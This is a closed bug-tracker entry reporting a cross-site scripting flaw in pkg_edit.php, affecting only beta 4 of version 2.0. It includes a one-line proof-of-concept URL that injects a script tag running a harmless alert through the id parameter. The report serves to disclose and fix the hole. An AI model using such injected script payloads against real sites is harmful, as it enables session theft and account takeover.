Project

General

Profile

Actions

Bug #992

closed

issue 3 THIS ONLY AFFECTS BETA 4 2.0

Added by dave b about 14 years ago. Updated about 14 years ago.

Status:
Closed
Priority:
Normal
Assignee:
-
Category:
-
Target version:
Start date:
11/04/2010
Due date:
% Done:

0%

Estimated time:
Plus Target Version:
Release Notes:
Affected Version:
2.0
Affected Architecture:

Description

issue 3 THIS ONLY AFFECTS BETA 4 2.0 (for more information see the first of these issues).

xss via pkg_edit.php
poc:
https://10.0.20.220/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E

Actions

Also available in: Atom PDF